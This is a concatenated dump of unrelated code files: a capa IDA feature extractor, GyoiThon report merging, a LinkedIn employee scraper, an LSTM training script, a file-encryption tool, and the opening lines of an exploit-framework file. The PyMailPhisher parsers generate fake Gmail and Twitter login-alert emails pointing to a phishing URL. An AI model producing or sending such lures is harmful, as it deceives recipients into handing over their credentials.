if " fs:30h" in disasm or " gs:60h" in disasm:
# TODO: replace above with proper IDA
yield Characteristic("peb access"), insn.ea
def extract_insn_segment_access_features(f, bb, insn):
""" parse instruction fs or gs access
TODO:
IDA should be able to do this...
"""
if all(map(lambda op: op.type != idaapi.o_mem, insn.ops)):
# try to optimize for only memory references
return
disasm = idc.GetDisasm(insn.ea)
if " fs:" in disasm:
# TODO: replace above with proper IDA
yield Characteristic("fs access"), insn.ea
if " gs:" in disasm:
# TODO: replace above with proper IDA
yield Characteristic("gs access"), insn.ea
def extract_insn_cross_section_cflow(f, bb, insn):
""" inspect the instruction for a CALL or JMP that crosses section boundaries
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
"""
for ref in idautils.CodeRefsFrom(insn.ea, False):
if ref in get_imports(f.ctx).keys():
# ignore API calls
continue
if not idaapi.getseg(ref):
# handle IDA API bug
continue
if idaapi.getseg(ref) == idaapi.getseg(insn.ea):
continue
yield Characteristic("cross section flow"), insn.ea
def extract_function_calls_from(f, bb, insn):
""" extract functions calls from features
most relevant at the function scope, however, its most efficient to extract at the instruction scope
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
"""
if idaapi.is_call_insn(insn):
for ref in idautils.CodeRefsFrom(insn.ea, False):
yield Characteristic("calls from"), ref
def extract_function_indirect_call_characteristic_features(f, bb, insn):
""" extract indirect function calls (e.g., call eax or call dword ptr [edx+4])
does not include calls like => call ds:dword_ABD4974
most relevant at the function or basic block scope;
however, its most efficient to extract at the instruction scope
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
"""
if idaapi.is_call_insn(insn) and idc.get_operand_type(insn.ea, 0) in (idc.o_reg, idc.o_phrase, idc.o_displ):
yield Characteristic("indirect call"), insn.ea
def extract_features(f, bb, insn):
""" extract instruction features
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
"""
for inst_handler in INSTRUCTION_HANDLERS:
for (feature, ea) in inst_handler(f, bb, insn):
yield feature, ea
INSTRUCTION_HANDLERS = (
extract_insn_api_features,
extract_insn_number_features,
extract_insn_bytes_features,
extract_insn_string_features,
extract_insn_offset_features,
extract_insn_nzxor_characteristic_features,
extract_insn_mnemonic_features,
extract_insn_peb_access_characteristic_features,
extract_insn_cross_section_cflow,
extract_insn_segment_access_features,
extract_function_calls_from,
extract_function_indirect_call_characteristic_features,
)
def main():
""" """
features = []
for f in capa.features.extractors.ida.helpers.get_functions(skip_thunks=True, skip_libs=True):
for bb in idaapi.FlowChart(f, flags=idaapi.FC_PREDS):
for insn in capa.features.extractors.ida.helpers.get_instructions_in_range(bb.start_ea, bb.end_ea):
features.extend(list(extract_features(f, bb, insn)))
import pprint
pprint.pprint(features)
if __name__ == "__main__":
main()
```
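`extract_insn_offset_features` normalises IDA's unsigned 32-bit displacement encoding with a two's-complement conversion so that negative structure offsets come out negative. Below is a small worked example of that conversion; the helper is re-implemented locally for illustration, since only its observable behaviour matters here.

```python
# Worked example of the 32-bit two's-complement conversion applied to
# instruction displacements (local re-implementation for illustration only;
# capa ships its own helper in capa.features.extractors.helpers).
def twos_complement(val, bits):
    """Interpret an unsigned `bits`-wide value as a signed integer."""
    if val & (1 << (bits - 1)):
        return val - (1 << bits)
    return val

print(twos_complement(0xFFFFFFFC, 32))  # -4  -> e.g. an operand like [esi-4]
print(twos_complement(0x00000004, 32))  #  4  -> e.g. an operand like [esi+4]
```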
#### File: features/extractors/loops.py
```python
from networkx import nx
from networkx.algorithms.components import strongly_connected_components
def has_loop(edges, threshold=2):
""" check if a list of edges representing a directed graph contains a loop
args:
edges: list of edge sets representing a directed graph i.e. [(1, 2), (2, 1)]
threshold: min number of nodes contained in loop
returns:
bool
"""
g = nx.DiGraph()
g.add_edges_from(edges)
return any(len(comp) >= threshold for comp in strongly_connected_components(g))
``` |
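A quick usage sketch for `has_loop` follows (it assumes the function defined above is in scope). Any strongly connected component with at least `threshold` nodes counts as a loop, so a simple back edge between two basic blocks is already enough.

```python
# Usage sketch for has_loop(); assumes the function above is importable/in scope.
edges_with_cycle = [(1, 2), (2, 3), (3, 1), (3, 4)]  # 1 -> 2 -> 3 -> 1 is a cycle
edges_acyclic = [(1, 2), (2, 3), (2, 4)]              # purely feed-forward flow

print(has_loop(edges_with_cycle))  # True: {1, 2, 3} is an SCC of size 3 >= threshold
print(has_loop(edges_acyclic))     # False: every SCC contains a single node
```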
{
"source": "5l1v3r1/GyoiThon",
"score": 2
} |
#### File: 5l1v3r1/GyoiThon/report_merger.py
```python
import os
import sys
import traceback
import re
import codecs
import glob
import configparser
import pandas as pd
from util import Utilty
# Type of printing.
OK = 'ok' # [*]
NOTE = 'note' # [+]
FAIL = 'fail' # [-]
WARNING = 'warn' # [!]
NONE = 'none' # No label.
# Merge report.
class MergeReport:
def __init__(self, utility):
self.utility = utility
# Read config file.
config = configparser.ConfigParser()
self.file_name = os.path.basename(__file__)
self.full_path = os.path.dirname(os.path.abspath(__file__))
config.read(os.path.join(self.full_path, 'config.ini'))
# Define report header.
self.header = ['No', '海外/国内', '会社名/組織名', 'カテゴリ', 'FQDN (URL)', 'リダイレクト/トップURL (URL)',
'ソース (URL)', 'FQDN (IPアドレス)', 'トップURL (IPアドレス)', 'フォーム (認証)', 'Basic (認証)',
'開発/本番 (環境)', 'クラウド (環境)', '製品 (CMS)', '管理画面 (CMS)', '不要なコンテンツ',
'ディレクトリ一覧の表示', 'エラーメッセージ', '不適切なコメント', 'Apache (製品)', 'PHP (製品)',
'OpenSSL (製品)', 'nginx (製品)', 'IIS (製品)', '.NET (製品)',
'MVC (製品)', 'WordPress (製品)', 'その他 (製品)', '備考']
# Must product name.
self.require_prduct = ['apache@http_server', 'php@php', 'openssl@openssl', 'nginx@nginx',
'microsoft@internet_information_server', '[email protected]', 'microsoft@mvc',
'wordpress@wordpress']
# Basic authentication regex.
self.basic_regex = 'WWW-Authenticate\:\s(Basic|Bearer|Digest|HOBA|Mutual|AWS4-HMAC-SHA256)\s'
self.basic_proxy_regex = 'Proxy-Authenticate\:\s(Basic|Bearer|Digest|HOBA|Mutual|AWS4-HMAC-SHA256)\s'
try:
self.local_header = (config['Report']['header']).split('@')
self.report_dir = os.path.join(self.full_path, config['Report']['report_path'])
self.in_report = os.path.join(self.report_dir, config['Report']['report_name'])
out_report_name = 'gyoithon_merge_report_{}.csv'.format(self.utility.get_current_date('%Y%m%d%H%M%S'))
self.out_report = os.path.join(self.report_dir, out_report_name)
except Exception as e:
self.utility.print_message(FAIL, 'Reading config.ini is failure : {}'.format(e))
self.utility.write_log(40, 'Reading config.ini is failure : {}'.format(e))
sys.exit(1)
# Create report's header.
def create_report_header(self):
self.utility.print_message(NOTE, 'Create report header : {}'.format(self.out_report))
self.utility.write_log(20, '[In] Create report header [{}].'.format(self.out_report))
# Create report header.
if os.path.exists(self.out_report) is False:
pd.DataFrame([], columns=self.header).to_csv(self.out_report, mode='w', index=False, encoding='Shift_JIS')
self.utility.write_log(20, '[Out] Create report header [{}].'.format(self.out_report))
# Get target report (local report).
def get_target_report(self):
# Gather reporting items.
csv_file_list = glob.glob(self.in_report)
# Create DataFrame.
try:
for report_idx, file in enumerate(csv_file_list):
self.utility.print_message(OK, '{}/{} Processing: {}'.format(report_idx+1, len(csv_file_list), file))
record = []
df_local = pd.read_csv(file, names=self.local_header, header=0, sep=',')
record.append(self.extract_report_element(report_idx+1, df_local))
# Add record.
pd.DataFrame(record).to_csv(self.out_report, mode='a', header=False, index=False, encoding='Shift_JIS')
except Exception as e:
t, v, tb = sys.exc_info()
self.utility.print_message(FAIL, 'Invalid file error: {}'.format(e))
self.utility.print_message(FAIL, traceback.format_exception(t, v, tb))
self.utility.print_message(FAIL, traceback.format_tb(e.__traceback__))
return
# Extract report's element from local reports.
def extract_report_element(self, report_idx, df_local):
record = []
record.insert(0, report_idx) # No.
record.insert(1, '-') # 海外/国内
record.insert(2, '-') # 会社名/組織名
record.insert(3, '-') # カテゴリ
record.insert(4, df_local['fqdn'][0]) # FQDN.
record.insert(5, df_local['origin_url'][0]) # トップURL
record.insert(6, '-') # ソース
record.insert(7, df_local['ip_addr'][0]) # FQDN.
origin_url_ip = (df_local['origin_url'][0]).replace(df_local['fqdn'][0], df_local['ip_addr'][0], 1)
record.insert(8, origin_url_ip) # トップURL.
# Check login form.
if self.check_login_form(df_local):
record.insert(9, '有')
else:
record.insert(9, '-')
# Check Basic authentication.
if self.check_basic_auth(df_local):
record.insert(10, '有')
else:
record.insert(10, '-')
record.insert(11, '-') # 開発/本番
record.insert(12, df_local['cloud_type'][0]) # クラウド
# Check CMS product.
cms_info = list(map(list, set(map(tuple, self.check_cms(df_local)))))
if len(cms_info) != 0:
cms_product = []
cms_manage_page = []
for cms in cms_info:
cms_product.append(cms[0])
cms_manage_page.append(cms[1])
record.insert(13, '\n'.join(cms_product)) # CMS 製品名
record.insert(14, '\n'.join(cms_manage_page)) # 管理画面
else:
record.insert(13, '-')
record.insert(14, '-')
# Check unnecessary contents.
record.insert(15, '\n'.join(self.check_unnecessary_content(df_local)))
record.insert(16, '-') # TODO:ディレクトリ一覧の表示
# Unnecessary comment and error message.
un_comment, error_msg = self.check_comment_error(df_local)
record.insert(17, '\n'.join(error_msg))
record.insert(18, '\n'.join(un_comment))
# Check products.
require_list, other_list = self.check_require_prduct(df_local)
for idx in range(len(require_list)):
if idx == 0: # Apache
self.set_require_prod(idx, 19, require_list, record)
elif idx == 1: # PHP
self.set_require_prod(idx, 20, require_list, record)
elif idx == 2: # OpenSSL
self.set_require_prod(idx, 21, require_list, record)
elif idx == 3: # nginx
self.set_require_prod(idx, 22, require_list, record)
elif idx == 4: # IIS
self.set_require_prod(idx, 23, require_list, record)
elif idx == 5: # .NET
self.set_require_prod(idx, 24, require_list, record)
elif idx == 6: # MVC
self.set_require_prod(idx, 25, require_list, record)
elif idx == 7: # WordPress
self.set_require_prod(idx, 26, require_list, record)
# Other products.
if len(other_list) != 0:
record.insert(27, '\n'.join(other_list))
else:
record.insert(27, '-')
# Note.
record.insert(28, '-')
return record
# Set requirement product.
def set_require_prod(self, prod_idx, rec_idx, require_list, record):
if require_list[prod_idx][0]:
if require_list[prod_idx][1] != '*':
record.insert(rec_idx, '\n'.join(require_list[prod_idx][1]))
else:
record.insert(rec_idx, '○')
else:
record.insert(rec_idx, '-')
# Check login form.
def check_login_form(self, df_local):
df_login = df_local[df_local['origin_login'] != 'Log : - %\nUrl : 0.0 %']
if len(df_login) != 0:
return True
else:
return False
# Check Basic authentication.
def check_basic_auth(self, df_local):
is_basic_auth = False
for log_path in df_local['log']:
with codecs.open(log_path, 'r', encoding='utf-8') as fin:
log_file = fin.read()
obj_match = re.search(self.basic_regex, log_file, flags=re.IGNORECASE)
if obj_match is not None:
is_basic_auth = True
break
obj_match = re.search(self.basic_proxy_regex, log_file, flags=re.IGNORECASE)
if obj_match is not None:
is_basic_auth = True
break
return is_basic_auth
# Check CMS.
def check_cms(self, df_local):
cms_info = []
df_cms = df_local[df_local['prod_type'] == 'CMS']
if len(df_cms) != 0:
for idx, cms_record in df_cms.iterrows():
local_record = []
local_record.insert(0, cms_record['prod_name'] + '/' + cms_record['prod_version'])
if 'Url : 100%' in cms_record['origin_login']:
local_record.insert(1, cms_record['url'])
else:
local_record.insert(1, '-')
cms_info.append(local_record)
return cms_info
# Check unnecessary contents.
def check_unnecessary_content(self, df_local):
un_contents = df_local[(df_local['method'] == 'Direct') | (df_local['method'] == 'Search')]['url']
return list(set(un_contents))
# Check unnecessary comments and error messages.
def check_comment_error(self, df_local):
comments = list(set(df_local['wrong_comment']))
error_msg = list(set(df_local['error_msg']))
return [s for s in comments if s != '-'], [s for s in error_msg if s != '-']
# Check require products.
def check_require_prduct(self, df_local):
# Apache, PHP, OpenSSL, nginx, IIS, ASP.NET, MVC, WordPress.
require_list = {0: [False, []], 1: [False, []], 2: [False, []], 3: [False, []],
4: [False, []], 5: [False, []], 6: [False, []], 7: [False, []]}
# Other products.
other_list = []
# Check required products.
for idx, target_product in enumerate(self.require_prduct):
target_item = target_product.split('@')
df_selected_record = df_local[(df_local['vendor_name'] == target_item[0]) &
(df_local['prod_name'] == target_item[1])]
version_list = []
if len(df_selected_record) != 0:
require_list[idx][0] = True
for pd_idx, record in df_selected_record.iterrows():
if record['prod_version'] != '*':
version_list.append('"' + str(record['prod_version']) + '"')
require_list[idx][1].extend(list(set(version_list)))
# Check other products.
df_rec = df_local[~((df_local['vendor_name'] == 'apache') & (df_local['prod_name'] == 'http_server')) &
~((df_local['vendor_name'] == 'php') & (df_local['prod_name'] == 'php')) &
~((df_local['vendor_name'] == 'openssl') & (df_local['prod_name'] == 'openssl')) &
~((df_local['vendor_name'] == 'nginx') & (df_local['prod_name'] == 'nginx')) &
~((df_local['vendor_name'] == 'microsoft') & (df_local['prod_name'] == 'internet_information_server')) &
~((df_local['vendor_name'] == 'microsoft') & (df_local['prod_name'] == 'asp.net')) &
~((df_local['vendor_name'] == 'microsoft') & (df_local['prod_name'] == 'mvc')) &
~((df_local['vendor_name'] == 'wordpress') & (df_local['prod_name'] == 'wordpress'))]
if len(df_rec) != 0:
for other_idx, record in df_rec.iterrows():
if record['prod_name'] != '-':
other_list.append(record['vendor_name'] + ' ' + record['prod_name'] + '/' + record['prod_version'])
return require_list, list(set(other_list))
# main.
if __name__ == '__main__':
merge = MergeReport(Utilty())
# Create report header.
merge.create_report_header()
# Merge report.
merge.get_target_report()
print('finish!!')
``` |
{
"source": "5l1v3r1/linkedin-sales-scraper",
"score": 3
} |
#### File: 5l1v3r1/linkedin-sales-scraper/main.py
```python
from LinkedinScraper import LinkedinScraper
def main():
username = "My LinkedIn Username"
password = "<PASSWORD>"
company = "Desired Company"
to_ignore = []
scraper = LinkedinScraper(
username=username,
password=password,
company_name=company,
count=100,
to_ignore=to_ignore,
guess_email=True,
headless=False,
link_scrape=True,
user_agent=False,
)
scraper.run()
if __name__ == "__main__":
main()
``` |
{
"source": "5l1v3r1/LSTM_ROM_Arxiv",
"score": 2
} |
#### File: BiLSTM/PODm3/trainBiLSTMROMiso.py
```python
import h5py
import numpy as np
import matplotlib.pyplot as plt
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.layers import TimeDistributed
from keras.layers import Bidirectional
from keras.callbacks import ModelCheckpoint
from keras.utils import np_utils
from keras import optimizers
from keras.models import load_model
f = h5py.File('PODm3_isotropicTurb32BoxALL.mat')
data = f.get('data')
data = np.transpose(data)
# Set User-defined params
n_cells=250
lr=0.005
batch_size = 32
epochs = 75
modelfilename = 'isoturb32boxROM_PODm3_c2.1.h5'
lossfilename = 'isoturb32boxROM_PODm3_c2.1_res'
length = 10
output = 10
def create_sequences(data, length, output):
nsignals = data.shape[1]
siglen = data.shape[0]
sampX=[]
sampy=[]
indx = siglen - output - length
for j in range(nsignals):
sig = data[:,j]
for i in range(indx):
tempX = sig[i:length+i]
tempy = sig[i+length:length+i+output]
sampX.append(tempX)
sampy.append(tempy)
nsamples = len(sampX)
X = np.array(sampX).reshape(nsamples, length, 1)
y = np.array(sampy).reshape(nsamples, output, 1)
return X, y
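# Illustrative sketch (added, not part of the original script): with length=10 and
# output=10, one signal of 100 samples yields 100 - 10 - 10 = 80 sliding windows, so
#   demo = np.arange(100, dtype=float).reshape(100, 1)
#   X_demo, y_demo = create_sequences(demo, 10, 10)
# returns X_demo with shape (80, 10, 1) and y_demo with shape (80, 10, 1).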
#Split training and test datasets
def define_test_dataset(X, y, n_patterns, ntestsigs):
testindex = int(np.floor(ntestsigs*n_patterns))
X_train = X[:-testindex,:,:]
y_train = y[:-testindex,:]
X_test = X[-testindex:,:,:]
y_test = y[-testindex:,:]
X_train = np.array(X_train)
y_train = np.array(y_train)
X_test = np.array(X_test)
y_test = np.array(y_test)
return X_train, y_train, X_test, y_test
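# Note (added): the split holds out the last floor(ntestsigs * n_patterns) windows;
# because windows are appended signal by signal, ntestsigs=1 with n_patterns equal to
# the windows-per-signal count reserves all windows of the final signal for testing.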
# configure problem
nsignals = data.shape[1]
siglen = data.shape[0]
# Extract sequences
inputdata = data[:,0:6]
X, y = create_sequences(inputdata, length, output)
#np.random.shuffle(X)
#np.random.shuffle(y)
ntestpatterns = siglen - length - output
ntestsigs = 1
X_train, y_train, X_test, y_test = define_test_dataset(X, y, ntestpatterns, ntestsigs)
X_train.shape
# define model
model = Sequential()
model.add(Bidirectional(LSTM(n_cells, return_sequences=True), input_shape=(length, 1)))
model.add(TimeDistributed(Dense(1)))
adam = optimizers.Adam(lr=lr, beta_1=0.9, beta_2=0.999, epsilon=1e-8)
model.compile(loss='mae', optimizer=adam)  # use the Adam instance above so the custom learning rate takes effect
print(model.summary())
# fit model
history = model.fit(X_train, y_train, batch_size=batch_size, epochs=epochs)
print('Saving weights..')
#save weights for analysis
model.save(modelfilename)
loss_history =history.history['loss']
# Save results to file
print('Saving results')
np.savez_compressed(lossfilename, batch_size=batch_size, epochs=epochs, loss_history=loss_history)
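# Hedged usage sketch (added; assumes the saved model file exists and X_test is defined):
#   model = load_model(modelfilename)
#   seed_window = X_test[-1].reshape(1, length, 1)
#   forecast = model.predict(seed_window)   # shape (1, length, 1): one prediction per input step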
``` |
{
"source": "5l1v3r1/PyMailPhisher",
"score": 3
} |
#### File: lib/parsers/gmail.py
```python
import os
import json
from lib.colors import style
# Generate a gmail email template
def gmail():
print (u"{}[2J{}[;H".format(chr(27), chr(27))) # Clear the terminal
print(style.YELLOW('--Fill the following credentials for Google Gmail phishing email--'))
name = str(input(style.GREEN('[+]') + style.RESET(' Displayed name: ')))
email = str(input(style.GREEN('[+]') + style.RESET(' Displayed email: ')))
url = str(input(style.GREEN('[+]') + style.RESET(' Phishing URL: ')))
device = str(input(style.GREEN('[+]') + style.RESET(' Login device [Eg: Windows, Iphone...]: ')))
browser = str(input(style.GREEN('[+]') + style.RESET(' Login browser [Eg: FireFox, Safari...]: ')))
city = str(input(style.GREEN('[+]') + style.RESET(' Login city: ')))
country = str(input(style.GREEN('[+]') + style.RESET(' Login country: ')))
day = str(input(style.GREEN('[+]') + style.RESET(' Login day [In numbers]: ')))
day_name = str(input(style.GREEN('[+]') + style.RESET(' Login day of the week: ')))
year = str(input(style.GREEN('[+]') + style.RESET(' Login year: ')))
time = str(input(style.GREEN('[+]') + style.RESET(' Login time [HH:MMpm/am]: ')))
timezone = str(input(style.GREEN('[+]') + style.RESET(' Login timezone [Eg: GMT, ETC...]: ')))
month = str(input(style.GREEN('[+]') + style.RESET(' Login month [eg: June]: ')))
if not url.startswith('http://') and not url.startswith('https://'):
url = f"http://{url}"
with open('Templates/Gmail.html', 'r') as read_file, \
open('Templates/Generated_Emails/GmailTemplate.html', 'w') as write_file:
for line in read_file:
write_file.write(line.replace('#NAME', name).replace('#EMAIL', email).replace('#URL', url).replace('#MONTH', month)
.replace('#DEVICE', device).replace('#BROWSER', browser).replace('#CITY', city).replace('#COUNTRY', country)
.replace('#DAY', day).replace('#YEAR', year).replace('#TIME', time).replace('#ZONE', timezone).replace('#ND', day_name))
```
#### File: lib/parsers/twitter.py
```python
import os
import json
from lib.colors import style
# Generate an twitter email template
def twitter():
print (u"{}[2J{}[;H".format(chr(27), chr(27))) # Clear the terminal
print(style.YELLOW('--Fill the following credentials for Twitter phishing email--'))
username = str(input(style.GREEN('[+]') + style.RESET(' Displayed username: ')))
url = str(input(style.GREEN('[+]') + style.RESET(' Phishing URL: ')))
city = str(input(style.GREEN('[+]') + style.RESET(' Login city: ')))
country = str(input(style.GREEN('[+]') + style.RESET(' Login country: ')))
browser = str(input(style.GREEN('[+]') + style.RESET(' Login browser [Eg: FireFox, Safari...]: ')))
device = str(input(style.GREEN('[+]') + style.RESET(' Login device [Eg: Windows, Iphone...]: ')))
if not url.startswith('http://') and not url.startswith('https://'):
url = f"http://{url}"
with open('Templates/Twitter.html', 'r') as read_file, \
open('Templates/Generated_Emails/TwitterTemplate.html', 'w') as write_file:
for line in read_file:
write_file.write(line.replace('#USERNAME', username).replace('#CITY', city).replace('#URL', url)
.replace('#COUNTRY' , country).replace('#DEVICE',device ).replace('#BROWSER', browser))
``` |
{
"source": "5l1v3r1/qiskit-ibmq-provider",
"score": 2
} |
#### File: api/rest/validation.py
```python
from marshmallow import pre_load
from marshmallow.validate import OneOf
from qiskit.providers.ibmq.apiconstants import ApiJobStatus
from qiskit.validation import BaseSchema
from qiskit.validation.fields import String, Nested, Integer, DateTime, Float
from qiskit.providers.ibmq.utils.fields import map_field_names
# Helper schemas.
class InfoQueueResponseSchema(BaseSchema):
"""Queue information schema, nested in StatusResponseSchema"""
# Optional properties
position = Integer(required=False, missing=None)
_status = String(required=False, missing=None)
estimated_start_time = DateTime(required=False, missing=None)
estimated_complete_time = DateTime(required=False, missing=None)
hub_priority = Float(required=False, missing=None)
group_priority = Float(required=False, missing=None)
project_priority = Float(required=False, missing=None)
@pre_load
def preprocess_field_names(self, data, **_): # type: ignore
"""Pre-process the info queue response fields."""
FIELDS_MAP = { # pylint: disable=invalid-name
'status': '_status',
'estimatedStartTime': 'estimated_start_time',
'estimatedCompleteTime': 'estimated_complete_time',
'hubPriority': 'hub_priority',
'groupPriority': 'group_priority',
'projectPriority': 'project_priority'
}
return map_field_names(FIELDS_MAP, data)
# Endpoint schemas.
class StatusResponseSchema(BaseSchema):
"""Schema for StatusResponse"""
# Optional properties
infoQueue = Nested(InfoQueueResponseSchema, required=False)
# Required properties
status = String(required=True, validate=OneOf([status.value for status in ApiJobStatus]))
class BackendJobLimitResponseSchema(BaseSchema):
"""Schema for BackendJobLimit"""
# Required properties
maximum_jobs = Integer(required=True)
running_jobs = Integer(required=True)
@pre_load
def preprocess_field_names(self, data, **_): # type: ignore
"""Pre-process the jobs limit response fields."""
FIELDS_MAP = { # pylint: disable=invalid-name
'maximumJobs': 'maximum_jobs',
'runningJobs': 'running_jobs'
}
return map_field_names(FIELDS_MAP, data)
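# Illustrative note (added): the @pre_load hooks rename camelCase API fields to the
# snake_case attributes declared above, e.g. {'maximumJobs': 5, 'runningJobs': 1}
# becomes {'maximum_jobs': 5, 'running_jobs': 1} before validation.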
``` |
{
"source": "5l1v3r1/SafeCrypta",
"score": 3
} |
#### File: 5l1v3r1/SafeCrypta/SafeCrypta.py
```python
import os
import time
import random
import hashlib
import getpass
import requests
import pyautogui
import pyAesCrypt
from pyautogui import position
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()'
def encryption():
print('Which key generation technique would you like to use (Use 1, 2 or 3)')
tech = input(
'[1] Random Seed/[2] Use existing seed/[3] Random KeyFile>>> ')
if tech == '1':
print('[*] Please wait while we get the environment...')
tech = None
res = requests.get(
'http://svnweb.freebsd.org/csrg/share/dict/words?view=co&content-type=text/plain')
words = ''
for i in range(random.randint(10, 15)):
words += random.choice(res.content.splitlines()
).lower().decode("utf-8") + ' '
print('Printing your seed for 15 seconds, then it will be destroyed')
print(words)
seed = words
words = None
time.sleep(15)
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
print('[*] Cleared Environment')
seeds = getpass.getpass('Please input the seed>>> ')
seeds = seeds.replace(" ", "")
if seeds != seed.replace(" ", ""):
print('You have incorrectly entered the seed!')
exit()
else:
print('Congrats, the seed you entered was correct')
seed = None
seedHash = hashlib.sha3_512(str.encode(seeds)).digest()
seeds = None
filename = input('Enter the name of the file>> ')
pyAesCrypt.encryptFile(
filename, filename + '.safec', str(seedHash), 64 * 1024)
print(
f'[*] Successfully encrypted {filename} into archive {filename}.safec')
if tech == '2':
print('[*] Please wait while we get the environment...')
tech = None
seed = getpass.getpass('Please input your seed>>> ')
seedHash = str(hashlib.sha3_512(str.encode(seed)).digest())
seed = None
filename = input('Enter the name of the file>> ')
pyAesCrypt.encryptFile(filename, filename +
'.safec', seedHash, 64 * 1024)
os.remove(filename)
print(
f'[*] Successfully encrypted {filename} into archive {filename}.safec')
seedHash = None
if tech == '3':
print('[*] Please wait while we get the environment...')
tech = None
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
print('[*] Please move your mouse around your screen')
# Ensure the user is moving their mouse around the screen
time.sleep(2)
random.seed(pyautogui.position()[0] + 7j * pyautogui.position()[1])
randomKeys = []
for i in range(random.randint(5, random.randint(10, 30))):
time.sleep(random.random())
seed = pyautogui.position()[0] + 9j * pyautogui.position()[1]
random.seed(seed)
if random.random() >= random.random():
integer = str(random.random()).split('.')
randomKeys.append(''.join(random.choice(chars) for i in range(
random.randint(0, 50))) + integer[1] + random.choice(chars) + integer[0])
else:
integer = str(random.random()).split('.')[1]
randomKeys.append(integer + random.choice(chars) * 5 + ''.join(
random.choice(chars) for i in range(random.randint(0, 50))))
random.seed(pyautogui.position()[
0] + 6j * int(str(int(str(time.time()).split('.')[1]) / 100).split('.')[0]))
random.shuffle(randomKeys)
random.seed(pyautogui.position()[
1] + 4j * int(str(int(str(time.time()).split('.')[1]) / 100).split('.')[0]))
random.shuffle(randomKeys)
random.seed(pyautogui.position()[0] + 1j * pyautogui.position()[1])
trueKey = random.choice(randomKeys)
print('[*] The random key has been generated, exporting to Key.safek')
with open('Key.safek', 'w') as f:
f.write(str(trueKey))
trueKey = str(hashlib.sha3_512(str.encode(trueKey)).digest())
print('[*] The random key has been exported')
filename = input('Enter the name of the file>> ')
pyAesCrypt.encryptFile(filename, filename +
'.safec', trueKey, 64 * 1024)
trueKey = None
os.remove(filename)
print(
f'[*] Successfully encrypted {filename} into archive {filename}.safec')
def decryption():
print('Which method would you like to use for decryption (Use 1 or 2)')
tech = input('[1] Use a seed or passphrase/[2] Use a KeyFile>>> ')
if tech == '1':
tech = None
seeds = getpass.getpass('Please input the seed/passphrase>>> ')
seeds = seeds.replace(" ", "")
seeds = str(hashlib.sha3_512(str.encode(seeds)).digest())
filename = input('Enter the name of the file>> ')
try:
pyAesCrypt.decryptFile(filename, filename.split(
'.')[0] + '.' + filename.split('.')[1], seeds, 64 * 1024)
except Exception as e:
print(e)
exit()
print('[*] Cleaning environment...')
seeds = None
os.remove(filename)
exportedFile = filename.split(".")[0] + "." + filename.split(".")[1]
print(
f'[*] Successfully decrypted {filename} into raw file {exportedFile}')
if tech == '2':
tech = None
keyFile = input('Enter the name of the KeyFile>> ')
filename = input('Enter the name of the file>> ')
with open(keyFile, 'r') as key:
keys = str(hashlib.sha3_512(
str.encode(key.read().strip())).digest())
try:
pyAesCrypt.decryptFile(filename, filename.split(
'.')[0] + '.' + filename.split('.')[1], keys, 64 * 1024)
except Exception as e:
print(e)
exit()
keys = None
exportedFile = filename.split(".")[0] + "." + filename.split(".")[1]
os.remove(filename)
print(
f'[*] Successfully decrypted {filename} into raw file {exportedFile}')
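# Note (added): decryption must reproduce the key derivation used at encryption time,
# i.e. the SHA3-512 digest string of the seed phrase (spaces stripped) or of the
# KeyFile contents; otherwise pyAesCrypt rejects the .safec archive.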
def generation():
tech = input('[1] Generate random seed//[2] Generate random KeyFile>> ')
if tech == '1':
print('[*] Please wait while we get the environment...')
tech = None
res = requests.get(
'http://svnweb.freebsd.org/csrg/share/dict/words?view=co&content-type=text/plain')
words = ''
for i in range(random.randint(10, 15)):
words += random.choice(res.content.splitlines()
).lower().decode("utf-8") + ' '
print('Printing your seed for 15 seconds, then it will be destroyed')
print(words)
time.sleep(15)
words = None
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
exit()
if tech == '2':
print('[*] Please wait while we get the environment...')
tech = None
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
print('[*] Please move your mouse around your screen')
# Ensure the user is moving their mouse around the screen
time.sleep(2)
random.seed(pyautogui.position()[0] + 7j * pyautogui.position()[1])
randomKeys = []
for i in range(random.randint(5, random.randint(10, 30))):
time.sleep(random.random())
seed = pyautogui.position()[0] + 9j * pyautogui.position()[1]
random.seed(seed)
if random.random() >= random.random():
integer = str(random.random()).split('.')
randomKeys.append(''.join(random.choice(chars) for i in range(
random.randint(0, 50))) + integer[1] + random.choice(chars) + integer[0])
else:
integer = str(random.random()).split('.')[1]
randomKeys.append(integer + random.choice(chars) * 5 + ''.join(
random.choice(chars) for i in range(random.randint(0, 50))))
random.seed(pyautogui.position()[
0] + 6j * int(str(int(str(time.time()).split('.')[1]) / 100).split('.')[0]))
random.shuffle(randomKeys)
random.seed(pyautogui.position()[
1] + 4j * int(str(int(str(time.time()).split('.')[1]) / 100).split('.')[0]))
random.shuffle(randomKeys)
random.seed(pyautogui.position()[0] + 1j * pyautogui.position()[1])
trueKey = random.choice(randomKeys)
exportWhere = input('Filename to export to>> ')
print(
f'[*] The random key has been generated, exporting to {exportWhere}')
with open(exportWhere, 'w') as f:
f.write(str(trueKey))
trueKey = str(hashlib.sha3_512(str.encode(trueKey)).digest())
print('[*] The random key has been exported')
def main():
print('Welcome to SafeCrypta | v1.0 File Encryption')
print('''
What would you like to do:
1.) Encrypt a file
2.) Decrypt a file
3.) Generate a random key''')
userInput = input('Option> ')
if str(userInput):
if userInput.lower().startswith('e'):
print('[*] Switching to encryption environment, please wait')
encryption()
elif userInput.lower().startswith('d'):
print('[*] Switching to decryption environment, please wait')
decryption()
elif userInput.lower().startswith('r') or userInput.lower().startswith('g'):
print('[*] Switching to generating environment, please wait')
generation()
elif userInput == '1':
print('[*] Switching to encryption environment, please wait')
encryption()
elif userInput == '2':
print('[*] Switching to decryption environment, please wait')
decryption()
elif userInput == '3':
print('[*] Switching to generating environment, please wait')
generation()
else:
print('[!] Exiting...')
exit()
else:
print('[!] Exiting...')
exit()
main()
``` |
{
"source": "5l1v3r1/saydog-framework",
"score": 3
} |
#### File: exploit/pytoolkit/terabyte.py
```python
import os, sys
import socket
import time
u='\033[4m'
